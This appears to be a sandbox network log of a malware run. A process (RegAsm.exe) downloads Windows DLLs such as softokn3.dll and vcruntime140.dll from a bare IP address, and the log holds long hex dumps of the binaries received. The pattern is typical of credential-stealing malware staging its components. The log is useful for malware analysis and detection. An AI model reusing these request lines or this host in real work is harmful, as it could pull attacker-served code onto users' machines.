2024-04-24 14:49:13 UTC	16136	IN	Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!.`pl- @A&@
2024-04-24 14:49:21 UTC	16384	IN	Data Raw: 89 c2 69 f3 90 01 00 00 29 f0 83 e2 03 66 85 d2 0f 94 c2 66 85 ff 0f 95 c6 20 d6 66 85 c0 0f 94 c0 08 f0 0f b6 c0 8d 04 40 8b 55 f0 0f be 84 82 20 7c 1a 10 89 41 10 8a 41 1a fe c8 0f b6 c0 ba 06 00 00 00 0f 49 d0 88 51 1a e9 f7 fe ff ff 83 c2 e8 89 51 0c 8b 41 10 89 45 f0 8b 71 14 40 89 41 10 66 ff 41 1c 0f b7 41 18 a8 03 0f 94 c3 69 f8 29 5c 00 00 8d 97 1c 05 00 00 66 c1 ca 02 0f b7 d2 81 fa 8f 02 00 00 0f 93 c2 20 da 81 c7 10 05 00 00 66 c1 cf 04 0f b7 ff 81 ff a3 00 00 00 0f 92 c6 08 d6 0f b6 d6 8d 14 52 0f be 94 96 20 7c 1a 10 39 55 f0 7c 26 89 f7 c7 41 10 01 00 00 00 8d 56 01 89 51 14 83 fe 0b 7c 12 c7 41 14 00 00 00 00 40 66 89 41 18 66 c7 41 1c 00 00 8a 41 1a fe c0 31 d2 3c 07 0f b6 c0 0f 4d c2 88 41 1a e9 51 fe ff ff c7 41 14 0b 00 00 00 8b 51 18 Data Ascii: i)ff f@U \|AAIQQAEq@AfAAi)\f fR \|9U\|&AVQ\|A@fAfAA1<MAQAQ
2024-04-24 14:49:21 UTC	16384	IN	Data Raw: 7f 06 00 74 69 31 db 8b 44 9f 14 be 48 01 1d 10 85 c0 74 02 8b 30 68 d3 fe 1b 10 56 e8 f7 5b 19 00 83 c4 08 85 c0 b8 79 64 1c 10 0f 45 c6 8b 4f 10 0f b6 0c 19 f6 c1 02 ba 98 dc 1c 10 be 48 01 1d 10 0f 44 d6 f6 c1 01 b9 b1 de 1c 10 0f 44 ce 50 52 51 68 7f a0 1b 10 8d 44 24 60 50 e8 d6 b7 06 00 83 c4 14 43 0f b7 47 06 39 c3 72 99 8b 44 24 60 8d 48 01 3b 4c 24 58 0f 83 b7 03 00 00 89 4c 24 60 8b 4c 24 54 c6 04 01 29 eb 25 8b 44 24 04 8b 4c 24 08 8b 44 81 10 0f be 08 8d 54 24 50 51 ff 70 20 68 2c e2 1c 10 52 e8 89 b7 06 00 83 c4 10 f6 44 24 64 07 0f 85 4b 03 00 00 8b 44 24 54 85 c0 74 21 8b 4c 24 60 c6 04 08 00 83 7c 24 5c 00 74 12 f6 44 24 65 04 75 0b 8d 4c 24 50 e8 d4 68 06 00 eb 04 8b 44 24 54 89 44 24 18 8b 45 08 8b 80 a0 00 00 00 83 e0 0c 83 f8 08 0f 85 Data Ascii: ti1DHt0hV[ydEOHDDPRQhD$`PCG9rD$`H;L$XL$`L$T)%D$L$DT$PQp h,RD$dKD$Tt!L$`\|$\tD$euL$PhD$TD$E
2024-04-24 14:49:22 UTC	16384	IN	Data Raw: 11 1e 10 77 26 8b 35 38 11 1e 10 85 f6 74 15 8b 0d 78 e0 1d 10 81 f9 80 c2 12 10 75 7b 56 ff 15 68 cc 1d 10 89 f8 5e 5f 5b 5d c3 a3 30 11 1e 10 eb d3 a3 0c 11 1e 10 eb b9 89 3d 20 11 1e 10 e9 54 ff ff ff 31 ff eb dc 8b 0d 40 e0 1d 10 ff 15 00 40 1e 10 57 ff d1 83 c4 04 eb ca ff 15 00 40 1e 10 56 ff d1 83 c4 04 e9 0b ff ff ff 89 f7 c1 ff 1f 29 f1 19 f8 31 d2 39 0d e4 10 1e 10 19 c2 7d 27 c7 05 50 11 1e 10 00 00 00 00 e9 20 ff ff ff 31 ff e9 6d ff ff ff ff 15 00 40 1e 10 56 ff d1 83 c4 04 e9 7b ff ff ff c7 05 50 11 1e 10 01 00 00 00 8b 1d 38 11 1e 10 85 db 74 2e 8b 0d 78 e0 1d 10 ff 15 00 40 1e 10 53 ff d1 83 c4 04 8b 1d 38 11 1e 10 85 db 74 12 8b 0d 70 e0 1d 10 ff 15 00 40 1e 10 53 ff d1 83 c4 04 a1 4c 11 1e 10 8b 0d 48 11 1e 10 89 ca 09 c2 0f 84 b1 fe ff Data Ascii: w&58txu{Vh^_[]0= T1@@W@V)19}'P 1m@V{P8t.x@S8tp@SLH
2024-04-24 14:49:22 UTC	16384	IN	Data Raw: 24 08 8b 70 44 8b 06 85 c0 0f 84 81 fd ff ff 8b 48 04 ff 15 00 40 1e 10 56 ff d1 83 c4 04 c7 06 00 00 00 00 e9 67 fd ff ff 8b 44 24 08 8b 70 40 8b 06 85 c0 74 2d 8b 4c 24 08 80 79 0d 00 75 11 8b 48 20 ff 15 00 40 1e 10 6a 01 56 ff d1 83 c4 08 8b 44 24 08 80 78 12 05 74 08 8b 44 24 08 c6 40 12 01 8b 4c 24 08 8a 41 0c 88 41 13 e9 13 fe ff ff 8b 44 24 08 8b 30 8b 4e 1c 85 c9 0f 84 88 fa ff ff 8b 44 24 08 8b b8 ec 00 00 00 ff 15 00 40 1e 10 6a 00 57 56 ff d1 83 c4 0c 89 44 24 0c e9 72 f6 ff ff 8b 4c 24 08 89 81 a0 00 00 00 e9 f7 f9 ff ff 8b 48 04 ff 15 00 40 1e 10 56 ff d1 83 c4 04 c7 06 00 00 00 00 e9 26 fa ff ff 31 f6 46 e9 d2 fc ff ff 31 db f6 44 24 1c 01 0f 84 40 fe ff ff 68 40 7e 1c 10 68 83 e4 00 00 68 14 dd 1b 10 68 78 fc 1b 10 6a 0e e8 0a 8f 02 00 83 Data Ascii: $pDH@VgD$p@t-L$yuH @jVD$xtD$@L$AAD$0ND$@jWVD$rL$H@V&1F1D$@h@~hhhxj
2024-04-24 14:49:22 UTC	16384	IN	Data Raw: 6f 8b 7d 0c 89 54 24 04 8b 0d 30 e4 1d 10 8b 45 08 8b 40 08 89 04 24 ff 15 00 40 1e 10 8d 44 24 10 50 8d 44 24 10 50 56 57 ff 74 24 10 ff d1 85 c0 0f 84 92 00 00 00 8b 44 24 0c 85 c0 8b 54 24 04 74 42 29 c6 72 3e 01 c2 83 d3 00 89 54 24 18 89 d9 81 e1 ff ff ff 7f 89 4c 24 1c 01 c7 85 f6 7f a2 8b 44 24 24 85 c0 0f 85 92 00 00 00 31 ff 8b 4c 24 28 31 e9 e8 9d 64 13 00 89 f8 8d 65 f4 5e 5f 5b 5d c3 8b 0d 8c e2 1d 10 ff 15 00 40 1e 10 ff d1 89 c2 8b 45 08 89 50 14 83 fa 70 74 05 83 fa 27 75 3f bf 0d 00 00 00 b9 0d 00 00 00 68 ee b2 00 00 8b 45 08 ff 70 1c 68 65 8a 1c 10 e8 c4 1e 14 00 83 c4 0c eb a7 8d 4c 24 24 8d 54 24 08 e8 12 20 14 00 85 c0 0f 85 2a ff ff ff 8b 54 24 08 eb b1 bf 0a 03 00 00 b9 0a 03 00 00 68 f3 b2 00 00 8b 45 08 ff 70 1c 68 20 85 1c 10 eb Data Ascii: o}T$0E@$@D$PD$PVWt$D$T$tB)r>T$L$D$$1L$(1de^_[]@EPpt'u?hEpheL$$T$ *T$hEph
2024-04-24 14:49:22 UTC	16384	IN	Data Raw: 68 7c ec 8b 44 24 0c 89 46 68 83 7c 24 04 01 75 72 8b 56 64 8d 1c 40 c1 e3 04 83 7c 1a 1c 00 74 4b 8b 4e 48 8b 01 85 c0 74 42 3d 58 00 1a 10 75 34 8b 86 a8 00 00 00 8b be ac 00 00 00 83 c0 04 83 d7 00 89 74 24 04 89 d6 8b 54 1a 18 0f af fa f7 e2 01 fa 52 50 51 e8 8c 45 12 00 89 f2 8b 74 24 10 83 c4 0c 8b 44 1a 18 89 46 38 31 ff 8b 4c 24 30 31 e9 e8 9f 24 13 00 89 f8 8d 65 f4 5e 5f 5b 5d c3 89 74 24 04 8b 86 e8 00 00 00 89 44 24 08 85 c0 0f 84 88 01 00 00 83 7c 24 0c 00 0f 84 ac 00 00 00 8b 44 24 04 8b 70 64 85 f6 0f 84 9d 00 00 00 8b 44 24 0c 48 8d 3c 40 c1 e7 04 8b 44 3e 14 89 44 24 0c b9 00 02 00 00 31 d2 e8 56 3e ff ff 89 44 24 18 85 c0 0f 84 ce 02 00 00 8d 04 3e 89 44 24 14 8d 04 3e 83 c0 14 89 44 24 08 8b 5c 24 18 89 d8 83 c0 04 68 fc 01 00 00 6a 00 Data Ascii: h\|D$Fh\|$urVd@\|tKNHtB=Xu4t$TRPQEt$DF81L$01$e^_[]t$D$\|$D$pdD$H<@D>D$1V>D$>D$>D$\$hj
2024-04-24 14:49:23 UTC	16384	IN	Data Raw: 00 00 00 8b 99 48 01 00 00 85 db 75 6b 8b 99 44 01 00 00 85 db 75 7b ff 81 40 01 00 00 8a 5d f3 88 d8 50 e8 d0 ca 11 00 83 c4 04 89 c3 85 c0 0f 84 a7 00 00 00 57 ff 75 e4 53 e8 0f 1c 18 00 83 c4 0c c6 04 3b 00 8d 04 b6 8b 4d ec 8d 04 81 83 c0 0c 89 18 0f b6 0b 80 b9 7a f8 19 10 00 78 4a 8b 4d e8 80 b9 d0 00 00 00 02 0f 83 83 00 00 00 83 c4 10 5e 5f 5b 5d c3 8b 03 89 81 48 01 00 00 e9 50 ff ff ff 8b 03 89 81 4c 01 00 00 e9 43 ff ff ff 8b 03 89 81 44 01 00 00 e9 36 ff ff ff ff 81 3c 01 00 00 e9 73 ff ff ff 80 f9 5b 0f b6 c9 ba 5d 00 00 00 0f 45 d1 89 55 ec 31 f6 46 89 df 8a 0c 33 3a 4d ec 74 06 88 0f 46 47 eb f2 8b 4d ec 38 4c 33 01 74 2d c6 07 00 eb 84 8d 04 b6 8b 4d ec 8d 04 81 83 c0 0c c7 00 00 00 00 00 e9 6d ff ff ff 8b 10 8b 4d e8 83 c4 10 5e 5f 5b 5d Data Ascii: HukDu{@]PWuS;MzxJM^_[]HPLCD6<s[]EU1F3:MtFGM8L3t-MmM^_[]
2024-04-24 14:49:23 UTC	16384	IN	Data Raw: f6 ff ff 8b 57 10 85 d2 74 09 8b 4c 24 20 e8 75 c2 ff ff 8b 7c 24 0c c7 47 10 00 00 00 00 e9 98 f6 ff ff 8b 06 89 81 44 01 00 00 e9 e3 f9 ff ff ff 81 3c 01 00 00 e9 80 fc ff ff 8b 44 24 14 80 b8 d0 00 00 00 00 0f 85 f3 fb ff ff 8b 44 24 20 8b 40 10 8b 4c 38 0c 83 79 48 00 0f 85 de fb ff ff ff 34 38 68 b4 e0 1c 10 ff 74 24 1c e8 06 09 00 00 83 c4 0c e9 c5 fb ff ff 8b 4c 24 1c e9 ae fd ff ff 8a 80 08 f7 19 10 3a 83 08 f7 19 10 0f 84 02 fa ff ff e9 c9 f9 ff ff 8b 44 24 20 80 b8 b1 00 00 00 00 0f 84 47 04 00 00 68 48 01 1d 10 ff 74 24 18 e8 5f 2a 01 00 83 c4 08 e9 33 f7 ff ff 8b 44 24 0c 80 48 1e 01 66 83 78 22 00 0f 8e a5 f5 ff ff 31 c9 b8 0e 00 00 00 8b 54 24 0c 8b 52 04 8b 74 02 f6 89 f7 c1 ef 04 83 e7 0f 83 ff 01 74 09 85 ff 75 0a e9 69 03 00 00 c6 44 02 Data Ascii: WtL$ u\|$GD<D$D$ @L8yH48ht$L$:D$ GhHt$_*3D$Hfx"1T$RttuiD
2024-04-24 14:49:23 UTC	16384	IN	Data Raw: c7 44 24 24 00 00 00 00 e9 0b f1 ff ff 8b 44 24 0c 8b 40 10 8b 40 1c 8b 4c 24 08 3b 41 3c 0f 84 95 ea ff ff 8b 7c 24 08 ff 37 68 27 f8 1c 10 ff 74 24 0c e8 e0 ea 00 00 83 c4 0c c7 44 24 24 00 00 00 00 e9 a2 f0 ff ff 68 48 e4 1b 10 8b 7c 24 08 57 e8 c1 ea 00 00 83 c4 08 be 0b 00 00 00 68 40 7e 1c 10 68 14 ce 01 00 68 40 bb 1b 10 68 78 fc 1b 10 56 e8 8f 4f 01 00 83 c4 14 89 77 0c c7 44 24 1c 00 00 00 00 e9 83 f8 ff ff 66 ba 1e 00 31 c0 85 c9 0f 85 54 f1 ff ff 31 d2 e9 5b f1 ff ff 31 ff 66 ba 28 00 be ff 0f 00 00 89 cb 31 c0 83 c2 28 89 f9 0f a4 d9 1c c1 e8 04 39 de bb 00 00 00 00 19 fb 89 cb 89 c7 0f 83 f2 f0 ff ff eb df a9 fd ff ff ff 74 65 31 f6 46 b8 ec bb 1b 10 e9 c1 fd ff ff 31 c0 e9 85 f2 ff ff c7 44 24 18 00 00 00 00 e9 36 f8 ff ff 8b 40 14 e9 d1 e9 Data Ascii: D$$D$@@L$;A<\|$7h't$D$$hH\|$Wh@~hh@hxVOwD$f1T1[1f(1(9te1F1D$6@

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.4	49759	95.217.246.168	443	4904	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-24 14:49:32 UTC	159	OUT	GET /softokn3.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0 Host: 95.217.246.168 Cache-Control: no-cache
2024-04-24 14:49:33 UTC	246	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 24 Apr 2024 14:49:32 GMT Content-Type: application/octet-stream Content-Length: 257872 Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT Connection: close ETag: "6315a9f4-3ef50" Accept-Ranges: bytes
2024-04-24 14:49:33 UTC	16138	IN	Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!PSg@ADvSw
2024-04-24 14:49:33 UTC	16384	IN	Data Raw: ff 89 85 f4 fe ff ff c7 85 f8 fe ff ff 04 00 00 00 8d 85 f0 fe ff ff 6a 01 50 53 57 e8 85 af 00 00 83 c4 10 89 c6 85 c0 75 3f 8b 85 ec fe ff ff 83 c0 fd 83 f8 01 77 25 be 30 00 00 00 83 3d 28 9a 03 10 00 75 23 83 3d 50 90 03 10 00 74 0e be 01 01 00 00 f6 05 20 9a 03 10 01 74 0c 53 57 e8 e2 b9 00 00 83 c4 08 89 c6 83 3d 2c 9a 03 10 00 0f 84 5e ff ff ff 8b 85 ec fe ff ff 83 c0 fe 83 f8 02 0f 87 4c ff ff ff 56 53 57 68 85 6b 03 10 68 00 01 00 00 8d 85 f0 fe ff ff 50 ff 15 1c 7c 03 10 83 c4 18 e9 2a ff ff ff cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 81 ec 08 01 00 00 a1 14 90 03 10 31 e8 89 45 f0 c7 85 ec fe ff ff 00 00 00 00 be 30 00 00 00 83 3d 28 9a 03 10 00 74 17 8b 4d f0 31 e9 e8 28 8b 02 00 89 f0 81 c4 08 01 00 00 5e 5f 5b 5d c3 8b 5d 0c c7 Data Ascii: jPSWu?w%0=(u#=Pt tSW=,^LVSWhkhP\|*USWV1E0=(tM1(^_[]]
2024-04-24 14:49:33 UTC	16384	IN	Data Raw: ff 83 c4 10 85 c0 0f 85 6b 03 00 00 57 e8 c4 9d ff ff 83 c4 04 ff 75 e8 53 57 e8 f7 9d ff ff 83 c4 0c ff 75 e8 8d 45 e8 50 53 57 e8 26 9e ff ff 83 c4 10 85 c0 0f 85 3c 03 00 00 8b 4d c8 83 c1 01 8b 75 e4 8b 45 dc 01 f0 3b 4d c0 0f 85 6c ff ff ff 31 f6 e9 20 03 00 00 31 f6 ff 35 30 9a 03 10 ff 15 f0 7b 03 10 83 c4 04 a1 34 9a 03 10 85 c0 74 15 6a 01 50 e8 57 4e 02 00 83 c4 08 c7 05 34 9a 03 10 00 00 00 00 a1 38 9a 03 10 85 c0 74 15 6a 01 50 e8 39 4e 02 00 83 c4 08 c7 05 38 9a 03 10 00 00 00 00 a1 3c 9a 03 10 85 c0 74 15 6a 01 50 e8 1b 4e 02 00 83 c4 08 c7 05 3c 9a 03 10 00 00 00 00 56 e8 e8 4d 02 00 83 c4 04 a3 34 9a 03 10 8b 47 38 a3 40 9a 03 10 8b 47 28 a3 44 9a 03 10 8b 47 2c a3 48 9a 03 10 8d 47 04 50 e8 bf 4d 02 00 83 c4 04 a3 38 9a 03 10 ff 75 0c e8 Data Ascii: kWuSWuEPSW&<MuE;Ml1 150{4tjPWN48tjP9N8<tjPN<VM4G8@G(DG,HGPM8u
2024-04-24 14:49:33 UTC	16384	IN	Data Raw: 10 88 41 03 0f b6 41 04 d1 e8 8a 80 68 f9 02 10 88 41 04 0f b6 41 05 d1 e8 8a 80 68 f9 02 10 88 41 05 0f b6 41 06 d1 e8 8a 80 68 f9 02 10 88 41 06 0f b6 41 07 d1 e8 8a 80 68 f9 02 10 88 41 07 ba 01 01 01 01 8b 31 31 d6 33 51 04 b8 01 00 00 00 09 f2 0f 84 37 01 00 00 ba 1f 1f 1f 1f 33 11 be 0e 0e 0e 0e 33 71 04 09 d6 0f 84 20 01 00 00 ba e0 e0 e0 e0 33 11 be f1 f1 f1 f1 33 71 04 09 d6 0f 84 09 01 00 00 ba fe fe fe fe 8b 31 31 d6 33 51 04 09 f2 0f 84 f5 00 00 00 ba 01 fe 01 fe 8b 31 31 d6 33 51 04 09 f2 0f 84 e1 00 00 00 ba fe 01 fe 01 8b 31 31 d6 33 51 04 09 f2 0f 84 cd 00 00 00 ba 1f e0 1f e0 33 11 be 0e f1 0e f1 33 71 04 09 d6 0f 84 b6 00 00 00 ba e0 1f e0 1f 33 11 be f1 0e f1 0e 33 71 04 09 d6 0f 84 9f 00 00 00 ba 01 e0 01 e0 33 11 be 01 f1 01 f1 33 71 Data Ascii: AAhAAhAAhAAhA113Q733q 33q113Q113Q113Q33q33q33q
2024-04-24 14:49:34 UTC	16384	IN	Data Raw: 00 e9 21 07 00 00 3d 50 06 00 00 0f 8f aa 01 00 00 3d 51 05 00 00 74 2d 3d 52 05 00 00 74 12 3d 55 05 00 00 0f 85 0a 07 00 00 c7 47 0c 01 00 00 00 83 7b 04 00 0f 84 ec 06 00 00 83 7b 08 10 0f 85 e2 06 00 00 c7 47 18 10 00 00 00 83 7c 24 24 25 0f 85 fb 07 00 00 6a 11 ff 74 24 30 e8 44 c7 00 00 83 c4 08 85 c0 0f 84 78 09 00 00 89 c7 31 c0 81 3b 51 05 00 00 0f 95 c0 ff 77 1c 8b 4d 20 51 50 ff 73 04 ff 77 18 e8 09 1e ff ff 83 c4 14 8b 4c 24 28 89 41 64 57 e8 a9 c6 00 00 83 c4 04 8b 44 24 28 83 78 64 00 0f 84 bf 08 00 00 83 7d 20 00 b9 60 2a 00 10 ba 20 2a 00 10 0f 44 d1 89 50 74 c7 80 84 00 00 00 e0 29 00 10 e9 eb 08 00 00 3d 09 21 00 00 0f 8e 1c 02 00 00 3d 0a 21 00 00 0f 84 08 02 00 00 3d 0b 21 00 00 0f 84 23 02 00 00 3d 21 40 00 00 0f 85 37 06 00 00 83 7c Data Ascii: !=P=Qt-=Rt=UG{{G\|$$%jt$0Dx1;QwM QPswL$(AdWD$(xd} `* *DPt)=!=!=!#=!@7\|
2024-04-24 14:49:34 UTC	16384	IN	Data Raw: 14 90 03 10 31 e8 89 45 f0 ff 75 08 e8 35 ab 00 00 83 c4 04 85 c0 74 5f 89 c6 8b 78 38 bb 91 00 00 00 85 ff 74 56 83 3f 03 75 51 8b 4d 18 8b 47 04 83 7d 14 00 74 59 8b 5d 0c 85 c0 74 64 89 ce 8b 4d 08 89 da 6a 03 ff 75 10 e8 47 fa ff ff 83 c4 08 89 c3 85 c0 75 24 56 ff 75 14 ff 75 08 e8 72 fd ff ff 83 c4 0c 89 c6 8b 4d f0 31 e9 e8 a3 8b 01 00 89 f0 eb 11 bb b3 00 00 00 8b 4d f0 31 e9 e8 90 8b 01 00 89 d8 83 c4 10 5e 5f 5b 5d c3 85 c0 74 06 83 7f 68 00 74 5a 81 c7 90 00 00 00 eb 55 8b 01 89 45 e8 8b 47 64 89 45 e4 8b 4f 74 ff 15 00 a0 03 10 8d 45 ec ff 75 10 53 ff 75 e8 50 ff 75 14 ff 75 e4 ff d1 83 c4 18 85 c0 74 32 e8 a1 8d 01 00 50 e8 eb 84 00 00 83 c4 04 8b 55 ec 8b 4d 18 89 11 bb 50 01 00 00 3d 50 01 00 00 74 8a eb 18 83 c7 60 8b 07 89 01 31 db e9 7a Data Ascii: 1Eu5t_x8tV?uQMG}tY]tdMjuGu$VuurM1M1^_[]thtZUEGdEOtEuSuPuut2PUMP=Pt`1z
2024-04-24 14:49:34 UTC	16384	IN	Data Raw: d8 00 00 00 00 c7 45 d4 04 00 00 00 eb 18 0f 1f 84 00 00 00 00 00 8b 47 fc 8b 00 89 45 d8 83 c7 0c 83 c6 ff 74 5a 8b 47 f8 85 c0 74 19 3d 61 01 00 00 74 e2 8b 4f fc eb 15 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 00 8b 4f fc 8b 11 89 55 d4 ff 37 51 50 ff 75 dc e8 8c 53 00 00 83 c4 10 85 c0 74 bd 89 c3 e9 80 01 00 00 bf 02 00 00 00 e9 83 01 00 00 c7 45 d4 04 00 00 00 c7 45 d8 00 00 00 00 8b 45 10 8b 4d 0c 83 ec 1c 0f 28 05 40 fb 02 10 0f 11 44 24 0c 89 44 24 08 89 4c 24 04 8b 45 08 89 04 24 e8 fe 7c ff ff 83 c4 1c 85 c0 74 0c 89 c3 ff 75 dc e8 7d 5a 00 00 eb 3d 8b 7d 18 8b 5d 14 57 e8 8b 4d 01 00 83 c4 04 89 c6 89 7d ec 8d 45 ec 50 56 57 53 ff 75 08 e8 e8 9a ff ff 83 c4 14 85 c0 74 26 89 c3 ff 75 dc e8 47 5a 00 00 83 c4 04 56 e8 78 4d 01 00 83 c4 04 83 fb 40 bf Data Ascii: EGEtZGt=atOf.OU7QPuStEEEM(@D$D$L$E$\|tu}Z=}]WM}EPVWSut&uGZVxM@
2024-04-24 14:49:34 UTC	16384	IN	Data Raw: 8b 48 38 b8 91 00 00 00 85 c9 74 4a 83 39 02 75 45 83 79 04 00 74 3f 8b 55 0c 8b 59 6c 83 c3 08 89 1f 31 c0 85 d2 74 2e b8 50 01 00 00 39 de 72 25 8b 01 89 02 8b 41 70 89 42 04 83 c2 08 ff 71 6c ff 71 64 52 e8 cc 0f 01 00 83 c4 0c 31 c0 eb 05 b8 b3 00 00 00 5e 5f 5b 5d c3 cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 83 ec 10 8b 7d 10 a1 14 90 03 10 31 e8 89 45 f0 85 ff 0f 84 2d 01 00 00 8b 5d 0c 8b 33 ff 75 08 e8 b5 2a 00 00 83 c4 04 b9 b3 00 00 00 85 c0 0f 84 12 01 00 00 83 fe 0a 0f 87 f7 00 00 00 b9 78 06 00 00 0f a3 f1 73 12 8d 48 38 eb 1a 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 00 b9 83 01 00 00 0f a3 f1 73 e4 8d 48 34 8b 09 83 fe 0a 77 2f ba 78 06 00 00 0f a3 f2 73 12 83 c0 38 eb 1a 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 00 ba 83 01 00 00 0f a3 f2 73 Data Ascii: H8tJ9uEyt?UYl1t.P9r%ApBqlqdR1^_[]USWV}1E-]3u*xsH8f.sH4w/xs8f.s
2024-04-24 14:49:34 UTC	16384	IN	Data Raw: cc cc cc cc cc cc 55 89 e5 53 57 56 ff 75 08 e8 c2 d8 ff ff 83 c4 04 85 c0 0f 84 9c 03 00 00 89 c6 c7 40 24 00 00 00 00 bf 02 00 00 00 83 78 0c 00 0f 88 54 03 00 00 ff 76 34 ff 15 f0 7b 03 10 83 c4 04 8b 46 34 8b 5e 40 8d 4b 01 89 4e 40 50 ff 15 10 7c 03 10 83 c4 04 83 fb 2c 0f 8f 29 03 00 00 6b c3 54 8d 0c 06 83 c1 64 89 4c 06 5c c7 44 06 64 57 43 53 ce c7 44 06 60 04 00 00 00 c7 44 06 58 00 00 00 00 c7 44 06 54 00 00 00 00 0f 57 c0 0f 11 44 06 44 83 7e 0c 00 0f 88 ea 02 00 00 8d 1c 06 83 c3 44 ff 76 34 ff 15 f0 7b 03 10 83 c4 04 69 4b 10 c5 90 c6 6a 8b 86 0c 0f 00 00 83 c0 ff 21 c8 8b 8c 86 10 0f 00 00 89 0b c7 43 04 00 00 00 00 8b 8c 86 10 0f 00 00 85 c9 74 03 89 59 04 89 9c 86 10 0f 00 00 ff 76 34 ff 15 10 7c 03 10 83 c4 04 83 7e 0c 00 0f 88 8b 02 00 Data Ascii: USWVu@$xTv4{F4^@KN@P\|,)kTdL\DdWCSD`DXDTWDD~Dv4{iKj!CtYv4\|~
2024-04-24 14:49:34 UTC	16384	IN	Data Raw: 00 89 f8 81 c4 3c 01 00 00 5e 5f 5b 5d c3 cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 89 d6 89 cf 8b 5d 08 8b 4b 24 ff 15 00 a0 03 10 ff 75 14 ff 75 10 ff 75 0c 53 ff d1 83 c4 10 85 c0 75 1e 31 c0 39 5e 34 0f 94 c0 89 f9 89 f2 ff 75 14 ff 75 10 ff 75 0c 50 e8 1c 2b 00 00 83 c4 10 5e 5f 5b 5d c3 cc cc cc cc 55 89 e5 53 57 56 83 ec 10 8b 45 08 8b 0d 14 90 03 10 31 e9 89 4d f0 c7 45 ec 00 00 00 00 85 c0 74 63 8b 75 10 8b 58 34 85 db 74 5d 85 f6 74 5f 8b 4d 0c 8d 45 e8 8d 7d ec 89 f2 50 57 e8 8e 00 00 00 83 c4 08 85 c0 74 60 89 c7 8b 45 ec 89 45 e4 8b 4b 14 ff 15 00 a0 03 10 ff 75 14 56 57 53 8b 5d e4 ff d1 83 c4 10 89 c6 85 db 74 40 57 e8 96 8d 00 00 83 c4 04 ff 75 e8 53 e8 b4 8d 00 00 83 c4 08 eb 29 31 f6 eb 25 8b 18 85 f6 75 a1 8b 4b 14 ff 15 00 a0 03 10 ff Data Ascii: <^_[]USWV]K$uuuSu19^4uuuP+^_[]USWVE1MEtcuX4t]t_ME}PWt`EEKuVWS]t@WuS)1%uK

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.4	49760	95.217.246.168	443	4904	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-24 14:49:35 UTC	163	OUT	GET /vcruntime140.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0 Host: 95.217.246.168 Cache-Control: no-cache
2024-04-24 14:49:36 UTC	245	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 24 Apr 2024 14:49:35 GMT Content-Type: application/octet-stream Content-Length: 80880 Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT Connection: close ETag: "6315a9f4-13bf0" Accept-Ranges: bytes
